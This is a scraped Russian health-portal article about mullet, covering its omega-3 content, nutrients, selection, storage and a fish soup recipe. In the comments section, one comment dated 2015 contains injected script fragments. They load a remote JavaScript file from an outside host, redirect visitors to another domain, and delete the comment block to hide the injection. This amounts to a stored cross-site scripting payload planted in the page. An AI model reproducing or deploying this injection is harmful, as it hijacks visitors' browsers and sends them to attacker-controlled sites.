Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кефаль: для здоровья серд...  >>  Кефаль: для здоровья сердца
 
Обратная связь
 

Кефаль: для здоровья сердца

Размер шрифта
14 марта 2012 10:00
  • google_analytics: false
  • Нравится

Кефаль – не рыба, а песня! Эта рыба богата омега-3 полиненасыщенными кислотами, которые защищают от атеросклероза. Как выбрать, как хранить и как правильно приготовить кефаль?

1 

Название «кефаль» происходит от греческого слова cephalus, которое в переводе обозначает «голова». Поэтому люди, живущие на побережье Черного моря, дали этой рыбе и другие названия, например, «голавль» или «лобан».

Достоинства кефали

  • Эта рыба очень вкусная и нежирная. Она практически не имеет мелких костей, поэтому относится к диетическим продуктам.
  • Рыба обладает низкой калорийностью – 88 ккал на 100 г.
  • Жир кефали содержит омега-3 полиненасыщенные кислоты. Это химические соединения, играющие важную роль в профилактике атеросклероза. Омега-3 полиненасыщенные жирные кислоты входят в состав рыбьего жира в капсулах, который рекомендуется для употребления взрослыми людьми, т.к. этот препарат уменьшает частоту инфаркта миокарда и нормализуют работу нервной системы.

Помимо этого омега-3 жирные кислоты помогают нашей коже сохранять поверхностную липидную пленку, которая несет защитную функцию и предотвращает проникновение через кожу болезнетворных бактерий.

  • В составе кефали большое количество белка – около 20 %.
  • Кефаль содержит фосфор, необходимый для построения скелета, цинк – для формирования половых клеток, а также марганец, калий и йод – те микроэлементы.

Пьедестал почета по содержанию фосфора

1. Тунец
2. Кефаль
3. Анчоус (килька)

Как выбрать

  • Выбирая кефаль, посмотрите, прозрачные ли глаза. Если они мутные, то рыба несвежая.
  • Жабры рыбы должны быть розовыми и чистыми.
  • Мясо должно быть упругим, тушка должна пахнуть морем.

Как хранить

Разделанная (без головы и жабр) и подсушенная рыба должна храниться в холодильнике не более 2-х дней. Если кефаль надо хранить дольше, заверните ее в фольгу, положите в вакуумный контейнер. В таком виде она сохранится в морозильной камере в течение 2-х месяцев.

1

Как приготовить

Готовить кефаль можно по-разному. Но если вы хотите поджарить ее, то делать это нужно без масла и на сковороде с керамическим покрытием.

Рецепт ухи из кефали

Ингредиенты:

  • Филе кефали – 300 г;
  • Коренья и зелень сельдерея и петрушки;
  • Соль и перец по вкусу.

Приготовление:
Отварить мясо кефали (варить не более 20 минут), добавить все остальные ингредиенты и довести до кипения. Уха готова.



      
Сюжеты по теме:
Кефаль: для здоровья сердца

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.